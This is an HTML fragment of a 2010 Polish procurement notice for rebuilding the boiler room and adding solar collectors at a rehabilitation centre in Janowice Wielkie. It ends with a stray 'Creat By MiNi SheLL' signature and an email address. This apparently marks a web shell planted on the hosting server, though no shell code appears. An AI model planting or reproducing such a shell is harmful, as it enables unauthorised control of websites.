<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :

a) zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu 
    zamówienia na osobę (y) spełniającą (e) co najmniej warunki podmiotowe określone w Cz.I. IDW,
    zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy

b) rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności, w których zbędne będzie wykonanie danej części zamówienia , wraz     
     z jednoczesnym związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony, przed podpisaniem umowy ,kosztorys ofertowy  ,   

c) wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w trakcie realizacji prac - nie powodujących zmian  w wysokości ceny umownej  wpisanej do umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zpir.sisco.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej Zamawiajacego_  http://zpir.sisco.pl , zakładka:przetargi.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2010 godzina 10:00, miejsce: Zespół Profilaktyki i Rehabilitacji w Janowicach Wielkich,ul. Świerczewskiego 12,58-520 Janowice Wielkie lub złożyć bezpośrednio w sekretariacie Dyrektora ZPiR,segment:administracja_parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  realizowany przy wsparciu środkami 
     Wojewódzkiego Funduszu  Ochrony Środowiska  i  Gospodarki Wodnej  we Wrocławiu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja budynku  SP ZOZ  Zespołu Profilaktyki i Rehabilitacji
w Janowicach Wielkich

 I etap 2010 r.:   A.  Przebudowa kotłowni na paliwo stałe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy obejmuje 
- w ramach zadania termomodernizacji obiektu przebudowę kotłowni z  wykonaniem instalacji elektrycznych i  sterowania urządzeń technologicznych  , układu solarny.  

Część A.

Przebudowana kotłownia pracować będzie na potrzeby co. i c.w.u. obiektu. 
W miejsce kotłów parowych zabudowane zostaną kotły opalane paliwem ekologicznym eko                                                                                                                                                                                                                     - groszkiem, węglem kamiennym.
Zaprojektowano kotłownię wodną systemu otwartego o parametrach 90/700C. 
Dla pokrycia zapotrzebowania na ciepło dobrano dwa automatyczne kotły z grupy wysoce ekologicznych , typu KW EKOCENTR każdy o mocy 250 [kW]  z dodatkowym rusztem.                   Z uwagi na drugi ruszt, do współspalania można używać dodatkowo drewna lub mieszanek biomasowo -węglowych (np. trociny lub granulat). Zmodernizowana kotłownia, zlokalizowana zostanie w miejscu istniejącej,  której  wszystkie  urządzenia przewidziane są do demontażu.
W  ramach przebudowy  kotłowni - z  istniejącej  kotłowni wydzielone będą pomieszczenia,            w których zainstalowane zostaną nowe kotły oraz zasobniki c.w.u. wspomagane układem solarnym.
Dla potrzeb budynku przewidziano 4 obiegi grzewcze - I i II obieg co. dla potrzeb budynku,            III - woda basenowa,  IV obieg instalacja c.w.u.  współpracująca  z  układem  solarnym.
Dla potrzeb nowej kotłowni wykorzystany zostanie istniejący skład paliwa oraz skład żużlu zachowano ten sam ciąg technologiczny dostarczania paliwa do kotłów i ich opróżniania.
Pracą każdego kotła sterować będą regulatory typu R501. Regulatorem nadrzędnym kaskady kotłów będzie Sterownik PXC100.D z ekranem PXM20 sterujący kaskadą kotłów i poszczególnymi obiegami grzewczymi oraz układem solarnym.
 
Przewody  w  kotłowni   zaprojektowano z  rur  stalowych   czarnych   przewodowych, łączonych   przez   spawanie   oraz   rur   stalowych   ocynkowanych,  izolowane.   
Woda instalacyjna uzdatniana będzie przez urządzenie Cosmowater.

Z części elektrycznej , dla potrzeb zasilania urządzeń w kotłowni  zaprojektowano: 
-instalacją zasilającą montowaną na tynku,  w listwach instalacyjnych , 
-instalację  sterowania urządzeń technologicznych,
-uziemienie ochronne przeciwporażeniowe z wykorzystaniem wyłączników różnicowoprądowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.10.00-6, 45.31.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termomodernizacja budynku  SP ZOZ  Zespołu Profilaktyki i Rehabilitacji
w Janowicach Wielkich

I etap 2010 r. :                B.  Układ solarny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy obejmuje:
Część B. 

Zaprojektowano system solarny na bazie kolektorów słonecznych typu CosmoSUN (Bimsplus) lub równoważnych, do podgrzewu ciepłej wody użytkowej.  Kolektory będą umieszczone na dachu budynku na typowej konstrukcji dostarczanej przez producenta. Rurarz od kolektorów do podgrzewacza będzie wykonany z rur miedzianych łączonych lutem. Kolektory montowane będą  na istniejącym, nowym  dachu z blachodachowki. 
Wyposażenie instalacji solarnej stanowią kolektory słoneczne CosmoSun Basic 2.51, Fk  = 2,19 [m2], składające się z 28 elementów. 
Obieg solarny został zaprojektowany jako instalacje zamknięta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.10.00-6, 45.31.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com